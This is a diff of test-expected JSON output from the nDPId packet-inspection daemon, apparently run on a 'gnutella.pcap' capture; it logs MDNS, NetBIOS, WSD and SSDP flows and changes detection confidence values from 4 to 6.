{"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"msedgewin10.local"}} 
+00672{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":23,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":12529,"flow_last_seen":12530,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":108,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":12530,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"msedgewin10.local"}} 00549{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":33,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":12827,"flow_last_seen":12827,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":12827,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"10.0.2.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":12827,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"thread_ts_msec":12827,"pkt":"\/\/\/\/\/\/\/\/CAAn5uVZCABFAABgHOwAAIARBJQKAAIPCgAC\/wCJAIkATEdqnCkpEAABAAAAAAABIEVORkRFRkVFRUhFRkZIRUpFT0RCREFDQUNBQ0FDQUFBAAAgAAHADAAgAAEABJPgAAYAAAoAAg8="} 
-00610{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":12827,"flow_last_seen":12827,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":12827,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"10.0.2.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00610{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":12827,"flow_last_seen":12827,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":12827,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"10.0.2.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":12827,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"thread_ts_msec":12827,"pkt":"\/\/\/\/\/\/\/\/CAAn5uVZCABFAABgHO0AAIARBJMKAAIPCgAC\/wCJAIkATMtnnCopEAABAAAAAAABIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUFBAAAgAAHADAAgAAEABJPgAAaAAAoAAg8="} 
00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":37,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":13118,"flow_last_seen":13118,"flow_idle_time":200000,"flow_min_l4_payload_len":1091,"flow_max_l4_payload_len":1091,"flow_tot_l4_payload_len":1091,"flow_avg_l4_payload_len":1091,"midstream":0,"thread_ts_msec":13118,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::c","src_port":63958,"dst_port":3702,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01911{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":13118,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1153,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1153,"pkt_l4_len":1099,"thread_ts_msec":13118,"pkt":"MzMAAAAMCAAn5uVZht1gB0PFBEsRAf6AAAAAAAAAxQ1Rn5ak4Qj\/AgAAAAAAAAAAAAAAAAAM+dYOdgRLOdU8P3htbCB2ZXJzaW9uPSIxLjAiIGVuY29kaW5nPSJ1dGYtOCI\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"} -00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":13118,"flow_last_seen":13118,"flow_idle_time":200000,"flow_min_l4_payload_len":1091,"flow_max_l4_payload_len":1091,"flow_tot_l4_payload_len":1091,"flow_avg_l4_payload_len":1091,"midstream":0,"thread_ts_msec":13118,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::c","src_port":63958,"dst_port":3702,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} 
+00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":13118,"flow_last_seen":13118,"flow_idle_time":200000,"flow_min_l4_payload_len":1091,"flow_max_l4_payload_len":1091,"flow_tot_l4_payload_len":1091,"flow_avg_l4_payload_len":1091,"midstream":0,"thread_ts_msec":13118,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::c","src_port":63958,"dst_port":3702,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} 00565{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":38,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":13118,"flow_last_seen":13118,"flow_idle_time":200000,"flow_min_l4_payload_len":1073,"flow_max_l4_payload_len":1073,"flow_tot_l4_payload_len":1073,"flow_avg_l4_payload_len":1073,"midstream":0,"thread_ts_msec":13118,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":63957,"dst_port":3702,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01861{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":13118,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1115,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1115,"pkt_l4_len":1081,"thread_ts_msec":13118,"pkt":"AQBef\/\/6CAAn5uVZCABFAARN4IUAAAER2REKAAIP7\/\/\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"} 
-00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":13118,"flow_last_seen":13118,"flow_idle_time":200000,"flow_min_l4_payload_len":1073,"flow_max_l4_payload_len":1073,"flow_tot_l4_payload_len":1073,"flow_avg_l4_payload_len":1073,"midstream":0,"thread_ts_msec":13118,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":63957,"dst_port":3702,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} +00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":13118,"flow_last_seen":13118,"flow_idle_time":200000,"flow_min_l4_payload_len":1073,"flow_max_l4_payload_len":1073,"flow_tot_l4_payload_len":1073,"flow_avg_l4_payload_len":1073,"midstream":0,"thread_ts_msec":13118,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":63957,"dst_port":3702,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} 01861{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":13322,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1115,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1115,"pkt_l4_len":1081,"thread_ts_msec":13322,"pkt":"AQBef\/\/6CAAn5uVZCABFAARN4IYAAAER2RAKAAIP7\/\/\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"} 
01911{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":13322,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1153,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1153,"pkt_l4_len":1099,"thread_ts_msec":13322,"pkt":"MzMAAAAMCAAn5uVZht1gB0PFBEsRAf6AAAAAAAAAxQ1Rn5ak4Qj\/AgAAAAAAAAAAAAAAAAAM+dYOdgRLOdU8P3htbCB2ZXJzaW9uPSIxLjAiIGVuY29kaW5nPSJ1dGYtOCI\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"} 00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":13443,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"thread_ts_msec":13443,"pkt":"\/\/\/\/\/\/\/\/CAAn5uVZCABFAABgHO4AAIARBJIKAAIPCgAC\/wCJAIkATEdmnCspEAABAAAAAAABIEVORkRFRkVFRUhFRkZIRUpFT0RCREFDQUNBQ0FDQUNBAAAgAAHADAAgAAEABJPgAAYAAAoAAg8="} 
@@ -64,18 +64,18 @@ 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":13765,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":70,"pkt_l4_len":16,"thread_ts_msec":13765,"pkt":"MzMAAAACCAAn5uVZht1gAAAAABA6\/\/6AAAAAAAAAxQ1Rn5ak4Qj\/AgAAAAAAAAAAAAAAAAAChQDYkwAAAAABAQgAJ+blWQ=="} 00561{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":82,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":15284,"flow_last_seen":15284,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":15284,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":63962,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00610{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":15284,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":15284,"pkt":"AQBef\/\/6CAAn5uVZCABFAACl4I8AAAQR2a8KAAIP7\/\/\/+vnaB2wAkQ9eTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1hbjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="} 
-00619{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":82,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":15284,"flow_last_seen":15284,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":15284,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":63962,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00619{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":82,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":15284,"flow_last_seen":15284,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":15284,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":63962,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00565{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":15285,"flow_last_seen":15285,"flow_idle_time":200000,"flow_min_l4_payload_len":95,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":95,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":15285,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::c","src_port":63960,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00579{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":15285,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":157,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":157,"pkt_l4_len":103,"thread_ts_msec":15285,"pkt":"MzMAAAAMCAAn5uVZht1gDyjoAGcRBP6AAAAAAAAAxQ1Rn5ak4Qj\/AgAAAAAAAAAAAAAAAAAM+dgHbABnVAhNLVNFQVJDSCAqIEhUVFAvMS4xDQpIb3N0OiBbRkYwMjo6Q106MTkwMA0KU1Q6IHVwbnA6cm9vdGRldmljZQ0KTWFuOiAic3NkcDpkaXNjb3ZlciINCk1YOiAzDQoNCg=="} -00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":83,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":15285,"flow_last_seen":15285,"flow_idle_time":200000,"flow_min_l4_payload_len":95,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":95,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":15285,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::c","src_port":63960,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":83,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":15285,"flow_last_seen":15285,"flow_idle_time":200000,"flow_min_l4_payload_len":95,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":95,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":15285,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::c","src_port":63960,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
00562{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":15285,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":143,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":143,"pkt_l4_len":109,"thread_ts_msec":15285,"pkt":"AQBef\/\/6CAAn5uVZCABFAACB4JAAAAQR2dIKAAIP7\/\/\/+vnaB2wAbXqpTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cG5wOnJvb3RkZXZpY2UNCk1hbjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="} 00569{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":15468,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":153,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":153,"pkt_l4_len":99,"thread_ts_msec":15468,"pkt":"MzMAAQACCAAn5uVZht1gA+R4AGMRAf6AAAAAAAAAxQ1Rn5ak4Qj\/AgAAAAAAAAAAAAAAAQACAiICIwBj2+oBE9HtAAgAAgEtAAEADgABAAEkIvGzCAAn5uVZAAMADAUIACcAAAAAAAAAAAAnAA0AC01TRURHRVdJTjEwABAADgAAATcACE1TRlQgNS4wAAYACAARABcAGAAn"} 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":88,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":15469,"flow_last_seen":15469,"flow_idle_time":200000,"flow_min_l4_payload_len":624,"flow_max_l4_payload_len":624,"flow_tot_l4_payload_len":624,"flow_avg_l4_payload_len":624,"midstream":0,"thread_ts_msec":15469,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::c","src_port":63965,"dst_port":3702,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01284{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":15469,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":686,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":686,"pkt_l4_len":632,"thread_ts_msec":15469,"pkt":"MzMAAAAMCAAn5uVZht1gCQFeAngRAf6AAAAAAAAAxQ1Rn5ak4Qj\/AgAAAAAAAAAAAAAAAAAM+d0OdgJ4bjk8P3htbCB2ZXJzaW9uPSIxLjAiIGVuY29kaW5nPSJ1dGYtOCI\/Pjxzb2FwOkVudmVsb3BlIHhtbG5zOnNvYXA9Imh0dHA6Ly93d3cudzMub3JnLzIwMDMvMDUvc29hcC1lbnZlbG9wZSIgeG1sbnM6d3NhPSJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8yMDA0LzA4L2FkZHJlc3NpbmciIHhtbG5zOndzZD0iaHR0cDovL3NjaGVtYXMueG1sc29hcC5vcmcvd3MvMjAwNS8wNC9kaXNjb3ZlcnkiIHhtbG5zOndzZHA9Imh0dHA6Ly9zY2hlbWFzLnhtbHNvYXAub3JnL3dzLzIwMDYvMDIvZGV2cHJvZiI+PHNvYXA6SGVhZGVyPjx3c2E6VG8+dXJuOnNjaGVtYXMteG1sc29hcC1vcmc6d3M6MjAwNTowNDpkaXNjb3Zlcnk8L3dzYTpUbz48d3NhOkFjdGlvbj5odHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8yMDA1LzA0L2Rpc2NvdmVyeS9Qcm9iZTwvd3NhOkFjdGlvbj48d3NhOk1lc3NhZ2VJRD51cm46dXVpZDozODVlNjBkOC0wOTJhLTRiMmItYmRmYy02YzJkMWQ1MGFjNDI8L3dzYTpNZXNzYWdlSUQ+PC9zb2FwOkhlYWRlcj48c29hcDpCb2R5Pjx3c2Q6UHJvYmU+PHdzZDpUeXBlcz53c2RwOkRldmljZTwvd3NkOlR5cGVzPjwvd3NkOlByb2JlPjwvc29hcDpCb2R5Pjwvc29hcDpFbnZlbG9wZT4="} -00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":15469,"flow_last_seen":15469,"flow_idle_time":200000,"flow_min_l4_payload_len":624,"flow_max_l4_payload_len":624,"flow_tot_l4_payload_len":624,"flow_avg_l4_payload_len":624,"midstream":0,"thread_ts_msec":15469,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::c","src_port":63965,"dst_port":3702,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} 
+00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":15469,"flow_last_seen":15469,"flow_idle_time":200000,"flow_min_l4_payload_len":624,"flow_max_l4_payload_len":624,"flow_tot_l4_payload_len":624,"flow_avg_l4_payload_len":624,"midstream":0,"thread_ts_msec":15469,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::c","src_port":63965,"dst_port":3702,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} 00561{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":89,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":15469,"flow_last_seen":15469,"flow_idle_time":200000,"flow_min_l4_payload_len":624,"flow_max_l4_payload_len":624,"flow_tot_l4_payload_len":624,"flow_avg_l4_payload_len":624,"midstream":0,"thread_ts_msec":15469,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":63964,"dst_port":3702,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01258{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":15469,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":666,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":666,"pkt_l4_len":632,"thread_ts_msec":15469,"pkt":"AQBef\/\/6CAAn5uVZCABFAAKM4JIAAAER2sUKAAIP7\/\/\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"} 
-00619{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":89,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":15469,"flow_last_seen":15469,"flow_idle_time":200000,"flow_min_l4_payload_len":624,"flow_max_l4_payload_len":624,"flow_tot_l4_payload_len":624,"flow_avg_l4_payload_len":624,"midstream":0,"thread_ts_msec":15469,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":63964,"dst_port":3702,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} +00619{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":89,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":15469,"flow_last_seen":15469,"flow_idle_time":200000,"flow_min_l4_payload_len":624,"flow_max_l4_payload_len":624,"flow_tot_l4_payload_len":624,"flow_avg_l4_payload_len":624,"midstream":0,"thread_ts_msec":15469,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":63964,"dst_port":3702,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} 00579{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":90,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":15500,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":157,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":157,"pkt_l4_len":103,"thread_ts_msec":15500,"pkt":"MzMAAAAMCAAn5uVZht1gDyjoAGcRBP6AAAAAAAAAxQ1Rn5ak4Qj\/AgAAAAAAAAAAAAAAAAAM+dgHbABnVAhNLVNFQVJDSCAqIEhUVFAvMS4xDQpIb3N0OiBbRkYwMjo6Q106MTkwMA0KU1Q6IHVwbnA6cm9vdGRldmljZQ0KTWFuOiAic3NkcDpkaXNjb3ZlciINCk1YOiAzDQoNCg=="} 
00562{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":15500,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":143,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":143,"pkt_l4_len":109,"thread_ts_msec":15500,"pkt":"AQBef\/\/6CAAn5uVZCABFAACB4JMAAAQR2c8KAAIP7\/\/\/+vnaB2wAbXqpTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cG5wOnJvb3RkZXZpY2UNCk1hbjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="} 01284{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":15624,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":686,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":686,"pkt_l4_len":632,"thread_ts_msec":15624,"pkt":"MzMAAAAMCAAn5uVZht1gCQFeAngRAf6AAAAAAAAAxQ1Rn5ak4Qj\/AgAAAAAAAAAAAAAAAAAM+d0OdgJ4bjk8P3htbCB2ZXJzaW9uPSIxLjAiIGVuY29kaW5nPSJ1dGYtOCI\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"} 
@@ -84,26 +84,26 @@ 01259{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":16062,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":666,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":666,"pkt_l4_len":632,"thread_ts_msec":16062,"pkt":"AQBef\/\/6CAAn5uVZCABFAAKM4JcAAAER2sAKAAIP7\/\/\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"} 00554{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":101,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":16487,"flow_last_seen":16487,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":16487,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"10.0.2.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 